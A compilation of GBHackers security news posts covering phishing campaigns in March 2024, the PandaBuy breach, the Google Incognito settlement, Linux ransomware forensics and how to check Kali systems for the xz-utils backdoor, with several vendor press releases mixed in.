While we have supported similar organizations for years, recent work with CISA prompted us to formalize and expand access to those at risk,” says Ramesh Rajagopal, CEO and co-founder of Authentic8.

High-risk communities eligible to apply to the Silo Shield Program include:

• **Journalists **focusing on topics like security, transparency and global affairs who perform online research and may be targeted by adversaries as a part of their work.

• Activists and non-profit groups are eligible for Silo Shield as they work to safeguard human rights, prevent abuse and effect justice, as they rely on online research to uncover and document abuses, legal violations and advocacy opportunities.

• Academics in fields like security, political science, sociology and environmental studies, whose research on global issues demands access to information across geographical boundaries — often in restrictive environments — are eligible.

• Humanitarian aid organizations, including those focusing on direct support, anti-corruption efforts and digital freedom are eligible for Silo Shield, as their efforts to compile evidence, vet suppliers and aid recipients, and communicate safely online are critical to their missions.

“Our commitment to high-risk communities is more than just a promise; it’s a mission to arm them with the tools they need to conduct their vital work securely and confidently.

We are proud to enable their access to global online resources without fear of adversary surveillance or compromise,” says Matt Ashburn, a former CIA cyber officer and White House NSC Director who now serves as Authentic8’s vice president of Customer Success.

Through the Joint Cyber Defense Collaborative (JCDC), Authentic8 collaborated with CISA on their High-Risk Communities Protection effort to elevate awareness of the cyber threats that high-risk communities experience and resources available to mitigate them.

CISA’s High-Risk Communities webpage serves as a one-stop-shop for cybersecurity guidance and free or discounted tools and resources that are tailored to meet the needs of high-risk organizations that want to improve their cybersecurity baseline.

For more information on the Silo Shield program or the Silo for Research digital investigations platform, visit https://authentic8.com.

Contact

Head of Strategic Initiatives

Abel Vandegrift

Authentic8

abel@authentic8.com #####

The post Authentic8 launches Silo Shield Program to Protect High-Risk Communities in Partnership with CISA appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

5 Major Phishing Campaigns in March 2024

March saw many notable phishing attacks, with criminals using new tactics and approaches to target unsuspecting victims.

It is time to explore some of the five most noteworthy campaigns to understand the current threat landscape better.

Pay close attention to the details of these attacks to determine whether your organization may be vulnerable.

Attack Using SmbServer to Steal Victims’ Credentials

SmbServer to Steal Victims’ Credentials

The month kicked off with an attack likely carried out by the infamous TA577 threat actor.

The campaign targeted victims’ credentials and began with a social engineering email, written in English or German, with the subject line “I sent a material your side last day, have you able to get it?”

Attached to the email was a ZIP archive containing a weaponized HTML file. From there, the attack unfolded the following way:

1. The victim opened the HTML page, built on a 450-byte template.

2. The page redirected the user to a file on an external server, leveraging impacket-smbserver via the SMB protocol.

3. The attackers received the victim’s data: IP address, NTLM challenge data, Username, and computer name.

To view a real-world sample of this phishing campaign, use **this analysis session report **in the ANY.RUN sandbox.

Integrate ANY.RUN in Your Company for Effective Malware Analysis

Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

• Real-time Detection

• Interactive Malware Analysis

• Easy to Learn by New Security Team members

• Get detailed reports with maximum data

• Set Up Virtual Machine in Linux & all Windows OS Versions

• Interact with Malware Safely

If you want to test all these features now with completely free access to the sandbox:

Try ANY.RUN for FREE Attack Utilizing Fake MS Outlook Login Pages A fake Nokia login page shown in the ANY.RUN sandbox

Early in March, another phishing campaign combined a Telegram bot with phishing pages hosted on Cloudflare Workers.

The motivation here was to steal user login credentials by automatically mimicking the look and feel of their organizations’ MS Outlook login pages.

These pages incorporated several elements:

• Base64 encoded background images and design elements sourced directly from Microsoft.

• Common JavaScript libraries like popper.js, jQuery, and Bootstrap provided a familiar user experience.

• The victim’s company logo was fetched from the Clearbit Logo service.

The attackers transmitted the victim’s login information to a Telegram bot. The user was then redirected to a legitimate Microsoft Outlook page.

An actual example of the attack detonated and thoroughly followed through with a test set of credentials can be accessed in the ANY.RUN sandbox.

Attack Targeting Users in Latin America

Attack Targeting Users

In March, one of the geo-specific campaigns was targeted against victims in the LATAM region. In one instance, the attackers impersonated Colombian government agencies as part of their spam emails.

The messages were accompanied by PDFs accusing recipients of traffic violations or other legal issues. From there, the attack went as follows:

1. The user opened a PDF and downloaded an archive.

2. The archive contained a VBS script.

3. Upon execution, the script ran a PowerShell script.

4. This PowerShell script fetched the final payload from a legitimate storage service.

The final payload was one of several remote access trojans (RATs): AsyncRAT, NjRAT, and Remcos.

See the entire execution chain of the attack, resulting in NjRAT infection, in a sandbox.

Attack Abusing AWS to Drop STRRAT

ANY.RUN showing the Github connection used for downloading STRRAT

Using legitimate services, such as AWS and Github to store payloads, this phishing campaign once again relied on social engineering.

Victims received emails that encouraged them to verify payment information by clicking a button, leading to the following:

1. By clicking the button, victims downloaded a malicious JAR file disguised as a payment invoice.

2. After launching, the file employed a PowerShell command to run two more JAR files.

3. The final stage involved VCURMS or STRRAT malware being pulled from Github or AWs and infecting the victim’s system.

To see an example of STRRAT being downloaded from Github and collect this malware’s configuration, use this analysis session in ANY.RUN.

Attack Exploiting TikTok and Google AMP

Phishing Page

The latest phishing campaign on this list employed several legitimate services simultaneously to get users to enter their credentials. It used a chain of redirects, starting from TikTok and ending with Cloudflare.

Here is a detailed overview of the attack:

1. A TikTok link that embeds a Google AMP external address within the URI “&target=” parameter triggers a redirect.

2. Google AMP then disguised a hidden address, which led to a URL Shortener Service. The destination domain address contained Unicode characters to mask the redirection target.

3. The URL shortener service redirected the victim’s browser to Cloudflare, which is used to host the phishing page.

The page featured a form containing various encrypted code elements that were gradually decrypted and assembled during browser rendering. It also blocked right-click interactions, making element inspection difficult.

After form submission, the victim’s stolen data got transmitted via an HTTP POST request to the attackers.

To get an inside look into this campaign, refer to this analysis session.

Analyze Phishing Campaigns in ANY.RUN

ANY.RUN is a cloud sandbox for advanced analysis of malware and phishing attacks.

The service provides a fully interactive virtual environment where you can study the threat and interact with it and the system.

For instance, in the case of phishing, it can help you complete steps requiring human interaction to understand the entire chain of attack.

The sandbox also lets you easily monitor malicious network and registry activity, track and examine processes, extract indicators of compromise, and download threat reports.

See how ANY.RUN can benefit your organization. Schedule a personalized demo for your security team.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post 5 Major Phishing Campaigns in March 2024 appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

4 Incident Triage Best Practices for Your Organization in 2024

Maintaining uninterrupted services is vital for any organization.

The backbone of ensuring this continuous uptime lies in the Incident Management process. Incident triage is a significant component of this process.

It enables organizations to prioritize and address potential incidents efficiently.

In this article, we’ll look into the elements of incident triage and outline best practices to streamline your organization’s incident response.

Incidents, ranging from minor glitches to critical outages, can disrupt operations and impact customer experience.

To mitigate these disruptions effectively, organizations must implement active Incident Management processes.

By identifying and addressing issues, organizations can minimize downtime, uphold service reliability, and safeguard their reputation.

How Incident Triage Works

To understand how incident triage works, it starts the moment a potential issue arises, prompting responders to assess its severity and determine the appropriate course of action.

This initial evaluation distinguishes between mere anomalies and genuine incidents, guiding subsequent response efforts.

So, through meticulous analysis and classification, organizations can optimize resource allocation and speed up incident resolution.

The Incident Lifecycle

Incident Detection & Classification

The first step in incident triage involves detecting and accurately classifying incoming alerts. It establishes predefined data fields and event tags and facilitates automated classification, reducing manual intervention and response times.

Moreover, it implements deduplication rules to prevent notification overload, ensuring that responders focus on unique incidents.

It also furnishes essential details and filters out irrelevant information, which helps organizations streamline the triage process and enhance operational efficiency.

Incident Alerting

Effective incident alerting hinges on delivering timely notifications for actionable events while mitigating alert fatigue.

Configuring deduplication and suppression rules prevents redundant alerts, enabling responders to prioritize critical incidents.

So, by optimizing alerting mechanisms, organizations cultivate a responsive incident management ecosystem conducive to swift resolution and minimal service disruption.

Incident Prioritization

Prioritizing incidents based on their impact and urgency is paramount for efficient triage and resource allocation.

Automated prioritization mechanisms, aligned with service and customer impact metrics, expedite incident handling and resolution.

So, an organization that equips responders with clear directives and contextual insights will optimize incident triage workflows and uphold service excellence.

Triage and Collaboration

Logical collaboration and streamlined communication are indispensable for effective incident triage and resolution.

Configuring incident routing and escalation policies ensures that incidents reach the appropriate responders promptly.

Leveraging platform-specific collaboration tools like Radiants Security will foster real-time communication and knowledge sharing, enhancing team cohesion and decision-making agility.

Incident Communication

Transparent and active communication is essential for managing stakeholder expectations and maintaining trust during incidents.

Automating communication updates and providing stakeholders with real-time insights fosters transparency and accountability.

Furthermore, maintaining a public status page facilitates active customer engagement and augments organizational resilience to disruptions.

Incident Resolution

Automation and documentation are cornerstones of efficient incident resolution processes.

Integrating incident management tools enables the execution of remedial actions, minimizing manual intervention and accelerating resolution.

So, documenting resolution efforts and maintaining comprehensive incident records empower organizations to derive insights and refine response strategies iteratively.

Incident Review & Remediation

Post-incident review and remediation are integral to continuous improvement and resilience enhancement.

Collaborative incident reviews, coupled with root-cause analysis, explain underlying issues and inform preventive measures.

Embracing a blameless culture fosters open dialogue and knowledge sharing, fostering a culture of continuous learning and innovation.

Extending Incident Triage Practices

As organizations innovate, so do the challenges they face in incident management.

To stay ahead of the curve, continually refining and expanding incident triage practices is essential.

Here are additional strategies to augment your incident response capabilities:

1. Advanced Automation

Harness the power of artificial intelligence and machine learning to automate complex incident detection and resolution tasks.

Implement predictive analytics algorithms to anticipate potential issues before they escalate, enabling active intervention and risk mitigation.

Leveraging cutting-edge automation technologies will enable organizations to enhance operational efficiency and resilience in the face of conventional threats.

2. Cross-Functional Training

Provide cross-functional training to incident response teams to foster a culture of collaboration and knowledge sharing.

Equip team members with an understanding of organizational systems and processes, enabling them to collaborate effectively across departments during incident triage and resolution.

By breaking down silos and promoting interdisciplinary cooperation, organizations can optimize incident response efforts and minimize disruptions.

3. Continuous Evaluation and Optimization

Assess incident triage processes and performance metrics regularly to identify areas for improvement.

Solicit feedback from frontline responders and stakeholders to gain insights into pain points and emerging challenges.

Iterate incident response workflows based on lessons learned from past incidents and industry best practices.

By embracing a culture of continuous evaluation and optimization, organizations can adapt and evolve their incident management capabilities to meet threats and business requirements.

4. Stakeholder Engagement

Engage stakeholders proactively throughout the incident triage and resolution process to manage expectations and maintain transparency.

Provide regular updates on incident status and mitigation efforts to internal teams, customers, and other relevant stakeholders.

Solicit stakeholder input and feedback to ensure that incident response efforts align with business priorities and customer needs.

Conclusion

Mastering incident triage is essential for organizations seeking to enhance their Incident Management capabilities and boost resilience against potential disruptions.

Organizations can effectively identify, prioritize, and resolve incidents by implementing best practices and leveraging advanced technologies like Radiants Security, ensuring uninterrupted service delivery and maintaining customer trust in today’s digital space.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post 4 Incident Triage Best Practices for Your Organization in 2024 appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Indian Govt Rescues 250 Citizens Trapped In Cambodia Forced Into Cyber-Slavery

A massive cyber fraud operation targeting Indians in Cambodia has emerged, with an estimated Rs 500 crore stolen in six months.

Over 5,000 Indian nationals are reportedly being held against their will and forced to participate in the elaborate scheme.

A high-level meeting was convened immediately, bringing together officials from the Ministry of External Affairs (MEA), the Ministry of Electronics and Information Technology (Meity), the Indian Cyber Crime Coordination Centre (I4C), and security experts to formulate a rescue strategy.

“The agenda of their meeting was to discuss the organized racket and bring back those who are trapped there. Data shows that Rs 500 crore has been lost (to cyber fraud originating in Cambodia) in India in the last six months,”.

250 Citizens Trapped In Cambodia

They also added that the agents target victims, mainly from southern India, with offers of data entry jobs.

Once in Cambodia, passports are confiscated, and victims are compelled into cyber fraud, including impersonating law enforcement for extortion.

On December 30, The Rourkela Police in Odisha arrested eight people who facilitated travel to Cambodia.

According to Dr. Arathi Krishna, Deputy Chairman of the Non-Resident Indian Forum of the Government of Karnataka (NRIFK), three Karnataka residents trapped in a Cambodian cyber fraud scheme have been rescued with the help of the Ministry of External Affairs (MEA).

Family members alerted NRIFK about the struggle.

Lured by promises of data entry jobs, the men were forced to participate in cyber scams.

Dr. Krishna commended the collaborative effort between NRIFK, the MEA, and the Indian embassy in securing their release.

The rescued individuals estimate that around 200 others from the region are still trapped.

Stephen, one of the rescued men, explained the ordeal-

An agent in Mangalore offered him a seemingly legitimate IT job in Cambodia.

Stephen and his companions were tricked with fake tourist visas and deceptive interviews.

“We had to create fake social media accounts with photographs of women sourced from different platforms. But we were told to be careful while picking these photos. So a South Indian girl’s profile would be used to trap someone in the North so that it did not raise any suspicion. We had targets and if we didn’t meet those, they would not give us food or allow us into our rooms. Finally, after a month and a half, I contacted my family and they took the help of some local politicians to speak to the embassy,” said, Stephen.

Rourkela Sub Divisional Police Officer Upasana Padhi explained the agents’ tactics.

They lured men with job prospects and then forced them to work for fraudulent companies upon arrival.

Passports were confiscated, and victims were subjected to 12-hour workdays under the threat of violence.

Authorities are actively identifying and working to repatriate more victims.

Padhi revealed details of the scams, which also involved cryptocurrency and fake stock investments facilitated by fraudulent online platforms.

The Ministry of External Affairs (MEA) addressed media inquiries concerning Indian nationals facing difficulties in Cambodia. Spokesperson Shri Randhir Jaiswal provided a statement

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Indian Govt Rescues 250 Citizens Trapped In Cambodia Forced Into Cyber-Slavery appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Swalwell for Congress Campaign Partners with Wolfsbane.ai to Protect Against AI-Generated Cloning

Today, Congressman Eric Swalwell, CA-14, announced that he has partnered with Wolfsbane.ai to help prevent his 2024 election campaign content from being used to create AI clones and deepfakes.

Wolfsbane.ai will use its patent-pending technology to encode Rep. Swalwell’s campaign videos and audio with a countermeasure that makes it difficult to create AI clones with that content.

Rep. Swalwell is the first political figure to use Wolfsbane.ai and take an active step to ensure that his campaign content is not used to create clones and fakes that can be used for misinformation. “Ensuring the integrity of our democratic process is of paramount importance,” said Swalwell.

“Embracing cutting-edge tools such as Wolfsbane.ai to prevent deepfakes is not just an option; it’s a necessity in safeguarding elections against fraud and misinformation.”

Rep. Swalwell is ranking member of the Cybersecurity and Infrastructure Protection Congressional Subcommittee where he has stressed the dangers of AI-generated deepfakes in spreading election misinformation. Rep.

Swalwell is not merely talking about preventing deepfakes, he is taking active steps to ensure that his own voice and likeness are protected using the latest technology advancements. “AI is a potent technology,” said Swalwell.

“If used irresponsibly, it can hijack the likeness and voice of public figures to undermine their credibility and spread disinformation. Wolfsbane.ai will mitigate the risks of this happening to me.”

One of the advancements in the fight against AI deepfakes is Wolfsbane.ai. Wolfsbane.ai is a recently launched service offered by Play Cubed: A company founded by content protection pioneers Randy Saaf and Octavio Herrera as well as Fazri Zubair and Noah Edelman.

Wolfsbane.ai allows customers to protect their content, voice, IP and identity from unauthorized AI cloning and deepfakes. Before publishing any content, Wolfsbane.ai customers can use a simple interface to upload and quickly process it; once done that content is protected by the Wolfsbane countermeasure and the user can publish their content with peace-of-mind.

Wolfsbane.ai’s patent-pending encoding technology offers a robust defense, designed to effectively combat a wide spectrum of AI cloning tools.

Wolfsbane.ai is being used by music artists, entertainment companies, content creators, and individuals but the company is very focused on working with campaigns as well as government officials.

“We are proud to be working with Rep. Swalwell’s campaign” said Play Cubed CEO Randy Saaf. “We think our technology can be an effective tool in the fight against AI fakes during this important election year.”

About Swalwell for Congress:

Elected in 2012 to Congress, representing the East Bay in Northern California, Eric Swalwell served eight years on the House Intelligence Committee where he was the chairman and ranking member overseeing the CIA.

On the Intelligence Committee, Eric helped lead the House Investigation into Russia’s interference in the 2016 election, and later, the first and second impeachments of Donald Trump.

As a member of the House Democrats’ leadership team, Eric was on the House Floor on January 6. A week after the attack, Eric was appointed as a House Impeachment Manager for the former president’s Senate trial.

Eric currently serves on the House Judiciary and Homeland Security Committees. He is also Chairman Emeritus and founder of Future Forum, a group of young Democratic members focused on issues and opportunities for millennial Americans.

Eric is also founder and co-chair of the bipartisan Critical Materials Caucus, and Personalized Medicine Caucus. Every day Eric strives to make sure if you work hard it adds up to doing better for yourself and dreaming bigger for your family.

About Play Cubed/Wolfsbane.ai

Play Cubed provides AI Content Protection services via its patent-pending technology Wolfsbane.ai.

Play Cubed is founded by Randy Saaf, Octavio Herrera, Fazri Zubair, and Noah Edelman. Our team has been together for over 8 years, with Randy and Octavio having worked together for over 20 years. Randy and Octavio are proven entrepreneurs with two successful exits valuing nearly $400M.

Randy and Octavio are content protection pioneers, having co-founded P2P anti-piracy provider MediaDefender in 2000. MediaDefender was used by every major music label and movie studio and was acquired by ARTISTDirect in 2005.

The Play Cubed team also has a successful history of developing enabling technologies used by top companies such as Major League Baseball, NBA, CBS, ESPN, Mattel, Universal Music, Sony Music, Lionsgate, and many more.

Contact

Cofounder

Octavio Herrera

Play Cubed

contact@playcubed.io

The post Swalwell for Congress Campaign Partners with Wolfsbane.ai to Protect Against AI-Generated Cloning appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

PandaBuy Data Breach: 1.3 Million Customers Data Leaked

PandaBuy, a popular online shopping platform, has been the victim of a significant data breach.

This breach has resulted in the leak of personal information belonging to more than 1.3 million customers.

The incident has raised serious concerns about cybersecurity practices and consumer data protection in the digital age.

The breach was first brought to light by members of the BreachForums, an infamous cybercrime forum.

Two threat actors, known by pseudonyms ‘Sanggiero’ and ‘IntelBroker,’ claimed responsibility for the hack.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

They alleged that they exploited several critical vulnerabilities in PandaBuy’s platform and API to gain unauthorized access to the company’s database.

The leaked data is extensive and includes sensitive personal information such as User IDs, first and last names, phone numbers, email addresses, login IPs, order details, home addresses, zip codes, and countries of residence.

According to the announcement on BreachForums, the dataset comprises over 3 million rows of data, indicating the scale and severity of the breach.

Evidence and Confirmation

To substantiate their claims, Sanggiero published a sample of the stolen data on the cybercrime forum and offered it for sale.

stolen data on the cybercrime forum and offered it for sale

@Sanggiero and @IntelBroker breached the website.” reads the announcement published by BreachForums.

This action has confirmed the breach and exposed the affected customers to potential further cybercrimes, including identity theft and phishing attacks.

Troy Hunt, the founder of Have I Been Pwned (HIBP), tweeted that a website that allows internet users to check whether data breaches have compromised their personal information confirmed the validity of 1.3 million email addresses from the leaked dataset.

Anyone seen a statement from Pandabuy on this? Apparently they're aware, but I'm not finding anything

[

https://t.co/AtkAI7f6Hn

](https://t.co/AtkAI7f6Hn)

— Troy Hunt (@troyhunt)

[

April 1, 2024

](https://twitter.com/troyhunt/status/1774704266500043067?ref_src=twsrc%5Etfw)

Hunt has since added these addresses to HIBP, enabling individuals to check if the breach impacted them.

PandaBuy’s Response and Controversy

PandaBuy has not officially acknowledged the security breach.

Troy Hunt confirmed allegations that the company might be attempting to downplay or hide the incident.

Speaking on a Discord channel, a company representative claimed that the security breach occurred in the past and insisted that no data breach had occurred this year.

This statement has done little to assuage the concerns of PandaBuy customers and cybersecurity experts.

This incident is a stark reminder of the ever-present threat of cyberattacks and the importance of robust cybersecurity measures.

Companies, especially those handling vast amounts of consumer data, must prioritize the security of their platforms to protect against such breaches.

For consumers, the breach underscores the need for vigilance and the adoption of best practices for digital security, such as using strong, unique passwords and being cautious of phishing attempts.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post PandaBuy Data Breach: 1.3 Million Customers Data Leaked appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Google to Delete Billions of User’s Personal Data Collected Via Chrome Browser

Google has agreed to delete billions of data records that reflect the private browsing activities of users.

This decision comes as part of a settlement for a lawsuit that accused the tech giant of improperly tracking users’ web-browsing habits who believed they were browsing the internet privately using Chrome’s ‘Incognito’ mode.

Settlement of the ‘Incognito’ Lawsuit

The lawsuit, originally filed in 2020, alleged that Google misrepresented the kind of data it collects from users who browsed the internet via ‘Incognito’ mode in Chrome.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

Google agreed to settle the suit late last year, and the settlement terms were disclosed in a filing on Monday.

As part of the settlement, Google must delete “billions of data records” that reflect the private browsing activities of users in the class action suit.

In addition to the data deletion, Google will update its disclosure to inform users about what data it collects each time a user initiates a private browsing session.

Google has already started implementing these changes.

As part of the settlement, Google will also let private browsing users block third-party cookies for the next five years.

The data deletion is a key milestone in Google’s Privacy Sandbox initiative, which aims to phase out third-party cookies in Chrome by the second half of 2024, subject to addressing any remaining competition concerns from the UK’s Competition and Markets Authority.

The initiative includes the introduction of Tracking Protection, a new feature that limits cross-site tracking by default restricting website access to third-party cookies.

Impact on User Privacy

The settlement and the Privacy Sandbox initiative represent significant steps towards enhancing user privacy on the web.

Google’s commitment to deleting extensive data and limiting tracking cookies showcases a shift towards a more privacy-conscious browsing experience.

The changes are vital to ensure that Google remains in cooperation with the EU’s General Data Protection Regulations (GDPR).

Future of Web Browsing

As Google continues to work on making the web more private, it also provides businesses with tools to succeed online.

The goal is to ensure that high-quality content remains freely accessible while creating a more private web than ever.

The regulatory environment keeps changing, but Google’s proactive steps to prioritize privacy in company culture and product design are positioning the company for what lies ahead.

Google’s decision to delete billions of users’ data marks a significant development in digital privacy.

With the implementation of the Privacy Sandbox and Tracking Protection, Google is setting a new standard for privacy on the web, balancing innovation with robust data privacy protections.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Google to Delete Billions of User’s Personal Data Collected Via Chrome Browser appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Pentagon Releases Cybersecurity Strategy To Strengthen Defense Industrial Base

The DoD DIB Cybersecurity Strategy is a three-year plan (FY24-27) to improve cybersecurity for defense contractors that aims to create a secure and resilient information environment for the Defense Industrial Base (DIB).

It will be achieved through collaboration between DoD and DIB, focusing on four key goals: strengthening DoD’s cybersecurity governance, enhancing contractor cybersecurity posture, ensuring critical capabilities are cyber-resilient, and improving collaboration with the DIB.

The strategy is in line with national strategies and makes use of the National Institute of Standards and Technology’s Cybersecurity Framework.

FY 2024 – 2027 DoD DIB Cybersecurity Strategy

DoD relies on the DIB to develop advanced technologies and maintain critical infrastructure, as DIB companies are vulnerable to cyberattacks from foreign adversaries and non-state actors, which could result in unauthorized access to sensitive data and disruption of critical business operations.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

The DoD has established a multi-pronged approach to improving DIB cybersecurity, including collaboration with industry associations and public-private partnerships.

The strategy will inform future updates to DoD’s DIB cybersecurity plan and focus on protecting DoD information, ensuring DIB supplier continuity of operations, and making the DIB more cyber-secure.

Current DoD and DIB Cybersecurity Efforts

The Department of Defense (DoD) will strengthen its governance structure for Defense Industrial Base (DIB) cybersecurity by fostering collaboration among stakeholders and developing regulations.

It includes establishing a DIB Cybersecurity Executive Steering Group (ESG) to coordinate policies and a DoD DIB Cybersecurity Program to implement a DoD-wide strategic approach.

It also works with DIB and interagency stakeholders to improve information sharing and develop a governance framework for subcontractor cybersecurity by improving the cybersecurity posture of the Defense Industrial Base (DIB) through a number of initiatives.

The initiatives include requiring DIB contractors to implement cybersecurity best practices and undergo assessments, sharing threat intelligence with DIB contractors, and improving the ability to recover from cyberattacks.

It will also work with DIB contractors to evaluate the effectiveness of cybersecurity regulations and policies.

DoD DIB Cybersecurity Strategic Alignment

The Department of Defense needs to prioritize the cybersecurity of critical Defense Industrial Base (DIB) production capabilities, which is achieveable by working with the DIB Sector Coordinating Council (SCC) to identify critical suppliers and facilities and setting clear policies on cybersecurity for them.

The DoD, as the Sector Risk Management Agency (SRMA) for the DIB, should focus government-led protection efforts on these critical assets, which will ensure that limited resources are directed towards the most impactful activities.

According to the Media Defense, DoD will collaborate with DIB to improve cybersecurity posture by leveraging commercial cybersecurity service providers, improving communication channels, and expanding information sharing.

NSA will share threat intelligence with DIB, and DIB SCC will collaborate with DoD to improve information sharing and also develop cyber incident scenarios and response playbooks to improve DIB’s resilience.

NIST Cybersecurity Framework 2.0 Core

The DoD DIB Cybersecurity Strategy outlines a collaborative effort between DoD and DIB to strengthen cybersecurity posture, which emphasizes information sharing, education, and baseline security requirements.

DoD will leverage expertise from the NSA, DC3, and USCYBERCOM to improve detection and response, which aims to continuously improve DIB cybersecurity through collaboration and resource coordination by ensuring the resilience of critical defense suppliers and producers against evolving cyber threats.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Pentagon Releases Cybersecurity Strategy To Strengthen Defense Industrial Base appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Live Forensic Techniques To Detect Ransomware Infection On Linux Machines

Ransomware, initially a Windows threat, now targets Linux systems, endangering IoT ecosystems.

Linux ransomware employs diverse encryption methods, evading traditional forensics.

Still developing, it shows potential for Windows-level impact. Early awareness allows for assessing IoT security implications.

The following cybersecurity analysts from Edinburgh Napier University recently unveiled live forensic techniques to detect ransomware infection on Linux machines:-

• Salko Korac

• Leandros Maglaras

• Naghmeh Moradpoor

• Bill Buchanan

• Berk Canberk

Live Forensic Techniques Ransomware

However, the increased use of IoT technologies has brought about interconnected devices without man’s intervention making them susceptible to ransomware attacks, especially in Linux-based IoT systems.

Although there have been efforts against paying ransomware and shifting cyber-criminal activities due to political issues, ransomware is still a significant concern with new ways of evading countermeasures.

Due to this reason proactive security measures are necessarily vital in protecting the IoT environments from this growing threat.

Response chain (Source – Arxiv)

There 24 major execution experiments were performed with retest across 12 combinations, involving three samples of ransomware on two Linux OS with two permission levels.

In balancing realism and effort, virtual machines simulated cloud environments to external memory dumps and network captures without the ransomware being detected.

Originally designed to be very realistic, the initial design led to lengthy forensic investigations that called for retesting environments to validate unforeseen results as well as removing disturbing elements.

Playbook for experiment execution (Source – Arxiv)

Replacing the Windows ransomware’s lateral movement and encryption of file shares and web server files that also provide user logins, Linux ransomware was not able to achieve very damaging results.

User files were encrypted by Cl0p and Icefire, thereby disabling GUI logins, while Blackbasta malware was aimed at /vmfs/volumes.

Most importantly, none of them used administrative permission adequately, hence MySQL/Sybase, SSH, FTP, or any Samba sharing were all left unharmed although they had been running as root.

Contrary to this approach, in companies where external storage is preferred to be on home or root directories, it might have resulted in less observable impact.

Ransomware activities exhibited by Linux are determined by those observed in Windows.

The research provides insights into the implications of Linux ransomware for the IoT industry.

Instead of encrypting data, criminals may block operations temporarily until payment is made through cyber-attacks on IoT gadgets.

Linux ransomware requires a lot of work and doesn’t scale well as it has to be specifically developed for each individual target, unlike modular Windows variants.

IoT solutions with strong security and low market visibility have less threat. The most scalable among these can attack either endpoints, gateways, or cloud infrastructure.

Further discoveries indicate that encryption techniques like RC4, ChaCha20 as well as AES are used by attackers which makes live forensics challenging compared to Windows platforms.

Recommendations

Presently, Linux ransomware causes limited harm, but it is expected to change in the future.

Risk management measures are suggested to secure Linux systems to enable risk evaluation and mitigation in the IoT industry.

Here below we have mentioned the recommendations:-

• Avoid HOME directories

• Separate and restrict permissions and data access

• Avoid using privileged users

• Focus on identifying backdoors

• Shut down first

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Live Forensic Techniques To Detect Ransomware Infection On Linux Machines appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

xz-utils Backdoor Affects Kali Linux Installations – How to Check for Infection

A critical vulnerability has been identified in the xz-utils package, versions 5.6.0 to 5.6.1, which harbors a backdoor capable of compromising system security.

This vulnerability, cataloged under CVE-2024-3094, poses a significant threat to the Linux ecosystem, including the widely used Kali Linux distribution, known for its robust security and penetration testing tools suite.

The Vulnerability: CVE-2024-3094

The backdoor discovered in the specified versions of xz-utils could allow an attacker to bypass sshd authentication, thereby gaining unauthorized remote access to the affected system.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

Given the ubiquity of xz-utils across various Linux distributions, the potential for widespread compromise was alarmingly high.

Fortunately, the issue was identified and addressed swiftly, mitigating the potential damage.

The vulnerability has been patched in Debian, from which Kali Linux derives much of its software base, thereby rectifying the issue for Kali users.

Impact on Kali Linux

For Kali Linux users, the vulnerability window was narrow but critical. The affected xz-utils version, 5.6.0-0.2, was available in the Kali repositories from March 26th to March 29th.

backdoor vulnerability

Users who updated their Kali Linux installations within this timeframe are at risk and must take immediate action to secure their systems.

If your Kali Linux system was not updated during this period, you are not at risk from this specific vulnerability.

However, staying informed and vigilant about system updates is always advisable to maintain security.

How to Check for Infection and Update

To determine if your Kali Linux system is affected, you can execute the following command in the terminal:

kali@kali:~$ apt-cache policy liblzma5 



liblzma5: 



 Installed: 5.4.5-0.3 



 Candidate: 5.6.1+really5.4.5-1 



 Version table: 



    5.6.1+really5.4.5-1 500 



       500 http://kali.download/kali kali-rolling/main amd64 Packages 



*** 5.4.5-0.3 100 



       100 /var/lib/dpkg/status

If the output indicates the installed version as 5.6.0-0.2, your system is vulnerable, and you must upgrade to the latest version, 5.6.1+really5.4.5-1. This can be achieved with the following commands:

kali@kali:~$ sudo apt update && sudo apt install -y --only-upgrade liblzma5

...

kali@kali:~$

For those seeking more detailed information on this vulnerability, several resources are available:

• Help Net Security provides a summarized post on the details of the vulnerability.

• Openwall features the initial disclosure of the vulnerability.

• The National Vulnerability Database (NVD) entry for CVE-2024-3094 offers comprehensive information on the specifics of the vulnerability.

This incident serves as a reminder of the constant vigilance required in the digital age to protect against evolving cybersecurity threats.

